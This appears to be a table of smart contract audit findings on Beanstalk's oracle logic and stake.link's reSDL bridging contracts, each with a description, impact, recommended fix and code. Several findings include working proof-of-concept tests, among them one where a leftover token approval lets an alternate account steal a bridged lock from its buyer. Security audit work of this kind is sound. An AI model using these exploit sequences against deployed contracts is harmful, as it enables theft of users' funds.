name
stringlengths
5
231
severity
stringclasses
3 values
description
stringlengths
107
68.2k
recommendation
stringlengths
12
8.75k
impact
stringlengths
3
11.2k
function
stringlengths
15
64.6k
Temperature and caseId are incorrectly adjusted when oracle fails
medium
When user calls `gm` and the call for the chainlink oracle fails, it will return 0 for the `deltaB` value and this will cause a cascade effect, making the calculation of `caseId` = `3` and using the incorrect `caseId` to set up the new temperature on Weather.sol\\n```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n\\nEvery consumer of the temperature on the protocol will be affected like:\\n`LibDibbler.morningTemperature`\\n`LibDibbler.beansToPods`\\n`LibDibbler.remainingPods`\\n`Sun.setSoilAbovePeg`\\n`Sun.stepSun`\\n`FieldFacet.maxTemperature`\\n`FieldFacet.totalSoil`\\n`FieldFacet._totalSoilAndTemperature`\\n`FieldFacet.sowWithMin\\n`gm` function uses the incorrect deltaB(0) to calculate the `caseId` which is then used to set the temperature.\\n```\\n function gm(address account, LibTransfer.To mode) public payable returns (uint256) {\\n int256 deltaB = stepOracle(); // @audit here if oracle failed, we update the season.timestamp and return deltaB zero here\\n uint256 caseId = calcCaseIdandUpdate(deltaB); // @audit caseId will be 3 here if deltaB is zero\\n LibGerminate.endTotalGermination(season, LibWhitelistedTokens.getWhitelistedTokens());\\n LibGauge.stepGauge();\\n stepSun(deltaB, caseId); // @audit wrong deltaB and caseId used here, setting the abovePeg to false and soil to zero\\n }\\n```\\n\\nPrepare the environment to work with Foundry + Updated Mocks https://gist.github.com/h0lydev/fcdb00c797adfdf8e4816031e095fd6c\\nMake sure to have the mainnet forked through Anvil: `anvil --fork-url https://rpc.ankr.com/eth`\\nCreate the `SeasonTemperature.t.sol` file under the folder `foundry` and paste the code below. Then run `forge test --match-contract SeasonTemperatureTest -vv`.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity =0.7.6;\\npragma abicoder v2;\\n\\nimport { Sun } from "contracts/beanstalk/sun/SeasonFacet/Sun.sol";\\nimport { MockSeasonFacet } from "contracts/mocks/mockFacets/MockSeasonFacet.sol";\\nimport { MockSiloFacet } from "contracts/mocks/mockFacets/MockSiloFacet.sol";\\nimport { MockFieldFacet } from "contracts/mocks/mockFacets/MockFieldFacet.sol";\\nimport { MockWhitelistFacet } from "contracts/mocks/mockFacets/MockWhitelistFacet.sol";\\nimport {LibWhitelist} from "contracts/libraries/Silo/LibWhitelist.sol";\\nimport { Utils } from "./utils/Utils.sol";\\nimport "./utils/TestHelper.sol";\\nimport "contracts/libraries/LibSafeMath32.sol";\\nimport "contracts/C.sol";\\n\\ncontract SeasonTemperatureTest is MockSeasonFacet, TestHelper {\\n using SafeMath for uint256;\\n using LibSafeMath32 for uint32;\\n\\n bool oracleFailed;\\n \\n function setUp() public {\\n console.log("diamondSetup");\\n vm.createSelectFork('local');\\n oracleFailed = false;\\n setupDiamond();\\n dewhitelistCurvePool();\\n mintUnripeLPToUser1(); \\n mintUnripeBeanToUser1();\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n _setReservesForWell(1000000e6, 1000e18);\\n \\n // user / tokens\\n mintTokenForUsers();\\n setTokenApprovalForUsers();\\n \\n enableFertilizerAndMintActiveFertilizers();\\n\\n callSunriseForUser1();\\n }\\n\\n\\n //////////// Setup functions ////////////\\n\\n function setTokenApprovalForUsers() internal { \\n approveTokensForUser(deployer);\\n approveTokensForUser(user1);\\n approveTokensForUser(user2);\\n approveTokensForUser(user3);\\n approveTokensForUser(user4);\\n approveTokensForUser(user5);\\n }\\n\\n function mintTokenForUsers() internal { \\n mintWETHtoUser(deployer);\\n mintWETHtoUser(user1);\\n mintWETHtoUser(user2);\\n mintWETHtoUser(user3);\\n mintWETHtoUser(user4);\\n mintWETHtoUser(user5);\\n\\n // mint C.bean() to users\\n C.bean().mint(deployer, 10e6);\\n C.bean().mint(user1, 10e6);\\n C.bean().mint(user2, 10e6);\\n C.bean().mint(user3, 10e6);\\n C.bean().mint(user4, 10e6);\\n C.bean().mint(user5, 10e6);\\n }\\n\\n function approveTokensForUser(address user) prank(user) internal { \\n mockWETH.approve(address(diamond), type(uint256).max);\\n unripeLP.approve(address(diamond), type(uint256).max);\\n unripeBean.approve(address(diamond), type(uint256).max);\\n well.approve(address(diamond), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n }\\n\\n function dewhitelistCurvePool() public {\\n vm.prank(deployer);\\n whitelist.dewhitelistToken(C.CURVE_BEAN_METAPOOL);\\n }\\n\\n function mintWETHtoUser(address user) prank(user) internal {\\n mockWETH.mint(user, 1000e18);\\n }\\n\\n function mintUnripeLPToUser1() internal { \\n unripeLP.mint(user1, 1000e6);\\n }\\n\\n function mintUnripeBeanToUser1() internal { \\n unripeBean.mint(user1, 1000e6);\\n }\\n\\n function enableFertilizerAndMintActiveFertilizers() internal { \\n // second parameter is the unfertilizedIndex\\n fertilizer.setFertilizerE(true, 10000e6);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(7500, 1e11, 99);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(6200, 1e11, 99);\\n\\n addUnripeTokensToFacet();\\n }\\n\\n function addUnripeTokensToFacet() prank(deployer) internal { \\n unripe.addUnripeToken(C.UNRIPE_BEAN, C.BEAN, bytes32(0));\\n unripe.addUnripeToken(C.UNRIPE_LP, C.BEAN_ETH_WELL, bytes32(0));\\n }\\n\\n function callSunriseForUser1() prank(user1) internal {\\n _ensurePreConditions();\\n _advanceInTime(2 hours);\\n season.sunrise();\\n }\\n\\n function setOraclePrices(bool makeOracleFail, int256 chainlinkPrice, uint256 ethUsdtPrice, uint256 ethUsdcPrice) internal { \\n if (makeOracleFail) { \\n _addEthUsdPriceChainlink(0);\\n oracleFailed = true;\\n } else { \\n oracleFailed = false;\\n _addEthUsdPriceChainlink(chainlinkPrice);\\n _setEthUsdtPrice(ethUsdtPrice);\\n _setEthUsdcPrice(ethUsdcPrice);\\n }\\n }\\n\\n ////////////////////////////////////////// TESTS //////////////////////////////////////////\\n\\n function testWrongCalcId_whenOracleFails() public { \\n _prepareForAbovePeg();\\n _advanceInTime(1 hours);\\n uint256 _snapId = vm.snapshot();\\n \\n // When sunrise succeeds\\n vm.prank(user4);\\n season.sunrise();\\n\\n // Then print results\\n _printProtocolState();\\n assertEq(season.getT(), 5, "when succeeds t should be 5");\\n \\n // Then revert it to prepare for the season that will fail\\n vm.revertTo(_snapId);\\n\\n // Prepare for the season that will fail\\n setOraclePrices(true, 0, 0, 0);\\n\\n // When sunrise fails\\n vm.prank(user4);\\n season.sunrise();\\n\\n console.log("Oracle failed, see results");\\n _printProtocolState();\\n assertEq(season.getT(), 1, "when succeeds t should be 1");\\n\\n }\\n\\n function _printProtocolState() internal { \\n console.log("-------------- Results --------------");\\n console.log("");\\n console.log("thisSowTime: ", season.thisSowTime());\\n console.log("lastSowTime: ", season.lastSowTime());\\n console.log("getUsdTokenPrice: ", season.getUsdTokenPrice());\\n console.log("getReserve0: ", season.getReserve0());\\n console.log("getReserve1: ", season.getReserve1());\\n console.log("getAbovePeg: ", season.getAbovePeg());\\n console.log("getSoil: ", season.getSoil());\\n console.log("lastDSoil: ", season.lastDSoil());\\n console.log("s.w.t: ", season.getT());\\n console.log("remaining pods: ", field.remainingPods());\\n } \\n\\n function _prepareForAbovePeg() internal { \\n season.mockSetSopWell(address(well));\\n season.captureWellE(address(well)); \\n season.setYieldE(5); // s.w.t\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n\\n season.setLastSowTimeE(1);\\n season.setNextSowTimeE(10);\\n season.calcCaseIdE(1e18, 1);\\n season.setAbovePegE(true);\\n }\\n\\n ////////////////////////////////////////// HELPERS //////////////////////////////////////////\\n\\n function _ensurePreConditions() internal { \\n assertTrue(season.thisSowTime() == type(uint32).max, "thisSowTime should be max");\\n assertTrue(season.lastSowTime() == type(uint32).max, "thisLastSowTime should be max");\\n assertEq(season.getIsFarm(), 1, "isFarm should be 1");\\n assertEq(season.getUsdTokenPrice(), 1, "usdTokenPrice should be 1");\\n assertEq(season.getReserve0(), 1, "reserve0 should be 1");\\n assertEq(season.getReserve1(), 1, "reserve1 should be 1");\\n assertFalse(season.getAbovePeg(), "pre - abovePeg should be false");\\n assertEq(season.getSoil(), 0, "soil should be == 0");\\n }\\n}\\n```\\n\\nOutput:\\n```\\n handleRain caseId: 0\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 462832752243\\n lastDSoil: 0\\n s.w.t: 5\\n remaining pods: 467461079765\\n\\nhandleRain caseId: 3\\n Oracle failed, see results\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 0\\n lastDSoil: 0\\n s.w.t: 1\\n remaining pods: 0\\n\\nSuite result: ok. 1 passed; 0 failed; 0 skipped; finished in 29.45s (3.32ms CPU time)\\n```\\n\\nps: a console.log was added to the `handleRain` function to print the caseId.\\nResult: In a normal scenario the temperature would have remained at the value `5` but in this case was set to `1` and remaining pods/soil are also set to zero when in fact they should not.
It is noticed that the developers have the intention of never reverting the sunrise function to decrease the risk of depeg and breaking the incentive for users calling it. But at the same time, those state variables shouldn't be updated as if the system is working correctly because they will impact the next season as stated in this finding.\\nIt is tricky to propose a simple fix to the problem without impacting the system as a whole. Here are a few ideas that could be used:\\n(Recommended) An effective solution could be store the latest response from chainlink and in case it fails and the timeout(a limit that you can be added to accept a previous response from the oracle) is not reached yet, protocol could use the previous response. Liquity Protocol uses this approach, an example here: https://github.com/liquity/dev/blob/main/packages/contracts/contracts/PriceFeed.sol This solution will be effective for the protocol because the oracle is also called in different places like when minting fertilizers(getMintFertilizerOut), getting the well price(getRatiosAndBeanIndex), and `getConstantProductWell`. As the oracle is used along the protocol in many places, the `latest successful price` would be often up-to-date and within the limit time defined to use the previous price when the chainlink oracle fails.\\nAdditionally, consider handling the errors properly before updating the `deltaB` and `abovePeg` variables, as these disrupt the peg mechanism logic.
The interest rate will be wrongly decreased to 1, compromising the protocol peg mechanism when it needs to be maintained with a high interest rate/ temperature.\\nSow will be calculated with the lowest temperature, also compromising the peg mechanism due to the wrong exchange of Beans -> Sow -> Pods\\nRemaining pods function will return zero and users will have an inaccurate number representing their actual pods.
```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n
`Chainlink` oracle returns stale price due to `CHAINLINK_TIMEOUT` variable in `LibChainlinkOracle` being set to 4 hours
medium
The `LibChainlinkOracle` library utilizes a `CHAINLINK_TIMEOUT` constant set to `14400` seconds (4 hours). This duration is four times longer than the `Chainlink` heartbeat that is `3600` seconds (1 hour), potentially introducing a significant delay in recognizing stale or outdated price data.\\nThe `LibChainlinkOracle::checkForInvalidTimestampOrAnswer` function accepts three input arguments: `timestamp`, `answer` and `currentTimestamp` and check if the return `answer` from `Chainlinlink Oracle` or the `timestamp` is invalid:\\n```\\n function checkForInvalidTimestampOrAnswer(\\n uint256 timestamp,\\n int256 answer,\\n uint256 currentTimestamp\\n ) private pure returns (bool) {\\n // Check for an invalid timeStamp that is 0, or in the future\\n if (timestamp == 0 || timestamp > currentTimestamp) return true;\\n // Check if Chainlink's price feed has timed out\\n if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\\n // Check for non-positive price\\n if (answer <= 0) return true;\\n }\\n```\\n\\nThe function also checks if the difference between the `currentTimestamp` and the `timestamp` is greater then `CHAINLINK_TIMEOUT`. The `CHAINLINK_TIMEOUT` is defined to be 4 hours:\\n```\\n uint256 public constant CHAINLINK_TIMEOUT = 14400; // 4 hours: 60 * 60 * 4\\n```\\n
Consider reducing the `CHAINLINK_TIMEOUT` to align more closely with the `Chainlink` heartbeat on Ethereum, enhancing the relevance of the price data.
The `Chainlink` heartbeat indicates the expected frequency of updates from the oracle. The `Chainlink` heartbeat on Ethereum for `Eth/Usd` is `3600` seconds (1 hour).\\nhttps://docs.chain.link/data-feeds/price-feeds/addresses?network=ethereum&page=1&search=0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\nBut the defined `CHAINLINK_TIMEOUT` in the `LibChainlinkOracle` is `14400` seconds (4 hours).\\nA `CHAINLINK_TIMEOUT` that is significantly longer than the heartbeat can lead to scenarios where the `LibChainlinkOracle` library accepts data that may no longer reflect current market conditions. Also, in volatile markets, a 4-hour window leads to accepting outdated prices, increasing the risk of price slippage.
```\\n function checkForInvalidTimestampOrAnswer(\\n uint256 timestamp,\\n int256 answer,\\n uint256 currentTimestamp\\n ) private pure returns (bool) {\\n // Check for an invalid timeStamp that is 0, or in the future\\n if (timestamp == 0 || timestamp > currentTimestamp) return true;\\n // Check if Chainlink's price feed has timed out\\n if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\\n // Check for non-positive price\\n if (answer <= 0) return true;\\n }\\n```\\n
[M] DOS in LibChainlinkOracle when not considering phaseId
medium
`LibChainlinkOracle` is not fully compatible with Chainlink's data model due to the lack of support for `phaseId and aggregatorRoundId`. Chainlink's `roundID` is a composite number combining a `phaseID and an aggregatorRoundID`.\\nThe `phaseID` changes whenever there is an upgrade to the underlying aggregator, and this change causes a significant jump in the `roundID` values due to the bit-shifting operation described in the documentation.\\nref here: https://docs.chain.link/data-feeds/historical-data#solidity\\nThe Beanstalk `LibChainlinkOracle` misinterprets the progression of `roundID` as sequential, overlooking Chainlink's unique bundling of `phaseId` and `aggregatorRoundId`. With the advancement of `phaseID`, there's an exponential increase in `roundID` by 2^64, leading to a temporal suspension until a new interval commences. This will instigate a denial-of-service scenario. The `getEthUsdTwap and getEthUsdPrice` functions are particularly susceptible to this vulnerability, as they rely on accurate TWAP values for their computations, which effects for example any calls reliant on Oracle data.\\n```\\nfunction getRoundData(uint80 _roundId)\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\\n }\\n```\\n\\n```\\n function latestRoundData()\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n Phase memory current = currentPhase; // cache storage reads\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = current.aggregator.latestRoundData();\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, current.id);\\n }\\n```\\n\\nhttps://etherscan.io/address/0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419#code\\nThe code segment extracted from the ETH/USD Chainlink aggregator above highlights the composite structure of `roundId`, integrating both `phaseId` and aggregatorRoundId. As highlighted, an increment in `phaseId` leads to a substantial leap in `roundId by 2^64`, thereby bypassing a number of "rounds." Consequently, any attempt to query currentRound - 1 post-upgrade encounters a non-existent round, triggering a revert. This condition could persist up to 24 hours based on configuration, impacting the timely execution of getEthUsdTwap and getEthUsdPrice.\\nThese functions, once operational again, might utilize altered TWAP values for computations, diverging from expected outcomes
Check return values of roundId. If the `roundID` is a nonzero value and is reverting then the oracle needs to try again with a lower `phaseId.`
If a `phaseID` increment occurs, it results in a jump in ``````roundID values, creating a gap in the sequence. When there are attempts to access round data for `roundIDs` within this gap, it will encounter inaccurate rounds, potentially causing the function to fail or return incorrect data, considering when the `phaseID` is incremented the `roundID increases by 2 ** 64.` This discrepancy can lead to a denial-of-servicein any calls to the oracle.
```\\nfunction getRoundData(uint80 _roundId)\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\\n }\\n```\\n
A user can steal an already transfered and bridged reSDL lock because of approval
high
The reSDL token approval is not deleted when the lock is bridged to an other chain\\nWhen a reSDL token is bridged to an other chain, the `handleOutgoingRESDL()` function is called to make the state changes into the `sdlPool` contract. The function executes the following:\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n\\nAs we can see, it deletes the lock.amount of the lockId, removes the ownership of the lock and decrements the lock balance of the account that is bridging the lock. The approval that the user had before bridging the reSDL lock will remain there and he can get benefited from it by stealing the NFT. Consider the following situation: A user knows that there is a victim that is willing to pay the underlying value for a reSDL lock ownership transfer. What the malicious user can do is set approval to move his lockId in all supported chains to an alt address that he owns. Then, he trades the underlying value for the reSDL ownership and the lock is transfered to the victim/buyer. If the buyer keeps the lock in this chain nothing happens, but if he bridges any of the other supported chains, the malicious user can use the approval of his alt account to steal the reSDL lock.\\nIt is written inside `resdl-token-bridge.test.ts` because it uses its setup\\n```\\n it('PoC steal reSDL', async () => {\\n let lockId = 2\\n\\n let thief = accounts[0]\\n let victim = accounts[1]\\n\\n let thiefAccount2 = accounts[2]\\n\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n // Thief approves an alt account that he controls to move his lock in the original chain\\n await sdlPool.approve(thiefAccount2, lockId)\\n\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief bridges the lock to an other chain but the approval is not deleted\\n await bridge.transferRESDL(77, victim, lockId, true, toEther(10), { value: toEther(10) })\\n let lastRequestMsg = await onRamp.getLastRequestMessage()\\n assert.deepEqual(\\n ethers.utils.defaultAbiCoder\\n .decode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],\\n lastRequestMsg[1]\\n )\\n .map((d, i) => {\\n if (i == 0) return d\\n if (i > 1 && i < 4) return fromEther(d)\\n return d.toNumber()\\n }),\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n )\\n assert.deepEqual(\\n lastRequestMsg[2].map((d) => [d.token, fromEther(d.amount)]),\\n [[sdlToken.address, 1000]]\\n )\\n assert.equal(lastRequestMsg[3], wrappedNative.address)\\n assert.equal(lastRequestMsg[4], '0x11')\\n await expect(sdlPool.ownerOf(lockId)).to.be.revertedWith('InvalidLockId()')\\n\\n // The user that received the lock from bridging on the other chain decides to bridge the lock id\\n // back to the original chain\\n await offRamp\\n .connect(signers[6])\\n .executeSingleMessage(\\n ethers.utils.formatBytes32String('messageId'),\\n 77,\\n ethers.utils.defaultAbiCoder.encode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n ),\\n sdlPoolCCIPController.address,\\n [{ token: sdlToken.address, amount: toEther(25) }]\\n )\\n\\n\\n // Now the victim owns the reSDL lock on the original chain\\n assert.equal(await sdlPool.ownerOf(2), victim)\\n\\n // However, this lockId has the approval that originally the thief set to his alt account and victim do not know that\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief transfers back to his main account the reSDL via his alt account\\n await sdlPool\\n .connect(signers[2])\\n .transferFrom(victim, thief, lockId)\\n\\n // Thief is now the owner of the reSDL\\n assert.equal(await sdlPool.ownerOf(2), thief)\\n })\\n```\\n
When bridging a lock between chains, the lock approval should be deleted.\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n \\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n// Add the line below\\n delete tokenApprovals[_lockId];\\n\\n uint256 totalAmount = lock.amount // Add the line below\\n lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] // Add the line below\\n= totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n
High, possibility to steal funds
```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n
Insufficient Gas Limit Specification for Cross-Chain Transfers in _buildCCIPMessage() method. WrappedTokenBridge.sol #210
low
The _buildCCIPMessage() function in the WrappedTokenBridge contract does not specify a gasLimit for the execution of the ccipReceive() function on the destination blockchain. This omission can lead to unpredictable gas costs and potential failure of the message processing due to out-of-gas errors.\\nThe Client.EVM2AnyMessage struct created by _buildCCIPMessage() is used to define the details of a cross-chain message, including the tokens to be transferred and the receiver's address. However, the struct lacks a gasLimit field in the extraArgs, which is crucial for determining the maximum amount of gas that can be consumed when the ccipReceive() function is called on the destination chain.\\nWithout a specified gasLimit, the default gas limit set by the CCIP router or the destination chain's infrastructure is used. This default may not align with the actual gas requirements of the ccipReceive() function, potentially leading to failed transactions or higher-than-expected fees.\\n` function _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({token: address(wrappedToken), amount: _amount}); tokenAmounts[0] = tokenAmount;\\n```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: "",\\n tokenAmounts: tokenAmounts,\\n extraArgs: "0x",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n\\n`
To address the issue of not including a gasLimit in the _transferTokens method, we can take inspiration from the sendMessage() example and modify the _buildCCIPMessage function within the WrappedTokenBridge contract to include a gasLimit in the extraArgs field of the EVM2AnyMessage struct. This will ensure that the CCIP message sent to the destination blockchain includes a specified maximum amount of gas that can be consumed during the execution of the ccipReceive() function.\\nfunction _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({ token: address(wrappedToken), amount: _amount }); tokenAmounts[0] = tokenAmount;\\n// // Include a gasLimit in the extraArgs Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({ receiver: abi.encode(_receiver), data: "", tokenAmounts: tokenAmounts, extraArgs: Client._argsToBytes( Client.EVMExtraArgsV1({gasLimit: 200_000, strict: false}) // Additional arguments, setting gas limit and non-strict sequency mode ), feeToken: _feeTokenAddress });\\n```\\nreturn evm2AnyMessage;\\n```\\n\\n}\\nIncludes a gasLimit field, which is set to 200,000 in this example. This value should be adjusted based on the expected gas consumption of the ccipReceive() function on the destination chain. By including the gasLimit in the extraArgs, you ensure that the CCIP message has a specified maximum gas limit for execution, which can prevent out-of-gas errors and control the cost of the cross-chain transfer.
If the default gas limit is too low, the ccipReceive() function may run out of gas, causing the transaction to fail on the destination chain.\\nWithout a specified gasLimit, the cost of sending a message can vary, making it difficult for users to predict the required fees.\\nIf the default gas limit is higher than necessary, users may overpay for gas that is not used, as unspent gas is not refunded.
```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: "",\\n tokenAmounts: tokenAmounts,\\n extraArgs: "0x",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n
Accidental `renounceOwnership()` call can disrupt key operations in multiple contracts.
low
`Ownable` contains a function named `renounceOwnership()` which can be used to remove the ownership of contracts in a protocol.\\nThis can lead to `SDLPoolCCIPControllerPrimary`, `SDLPoolCCIPControllerPrimary`, `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts becoming disowned, which will then break critical functions of the protocol.\\nThe `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts inherit from `Ownable`, `SDLPoolCCIPControllerPrimary` from `SDLPoolCCIPController` which inherits `Ownable`, and `SDLPoolCCIPControllerSecondary` inherits from SDLPoolCCIPControllerPrimary; and hence inherit `renounceOwnership()` function.\\nThe owner could accidentally (or intentionally) call `renounceOwnership()` which transfers ownership to `address(0)`. This will break numerous functions within each contract referenced that has the `onlyOwner()` modifier assigned. Below are a list of those functions:\\n`SDLPoolCCIPControllerPrimary`\\n`setRewardsInitiator()`\\n`setWrappedRewardToken()`\\n`approveRewardTokens()`\\n`removeWhitelistedChain()`\\n`addWhitelistedChain()`\\n`SDLPoolCCIPControllerSecondary`\\n`setExtraArgs()`\\n`WrappedTokenBridge`\\n`recoverTokens()`\\n`transferTokens()`\\n`LinearBoostController`\\n`setMaxLockingDuration()`\\n`setMaxBoost()`\\n`RESDLTokenBridge`.\\n`setExtraArgs()`\\nPOC\\nAdd this test to `test/core/ccip/sdl-pool-ccip-controller-primary.test.ts`\\n```\\n it.only('renounce ownership', async () => {\\n console.log("Owner before", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log("Set max link fee with onlyOwner modifier", await controller.maxLINKFee())\\n \\n // renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log("set max link fee hasn't changed", await controller.maxLINKFee())\\n // console out the owner\\n console.log("Owner after", await controller.owner())\\n \\n })\\n```\\n
Accidental `renounceOwnership()` call can disrupt key operations in multiple contracts.\\nDisable `renounceOwnership()` if function in the Ownable contract not required.\\n```\\n// Add the line below\\n function renounceOwnership() public override onlyOwner {\\n// Add the line below\\n revert ("Not allowed");\\n// Add the line below\\n }\\n```\\n
null
```\\n it.only('renounce ownership', async () => {\\n console.log("Owner before", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log("Set max link fee with onlyOwner modifier", await controller.maxLINKFee())\\n \\n // renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log("set max link fee hasn't changed", await controller.maxLINKFee())\\n // console out the owner\\n console.log("Owner after", await controller.owner())\\n \\n })\\n```\\n
No way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.
medium
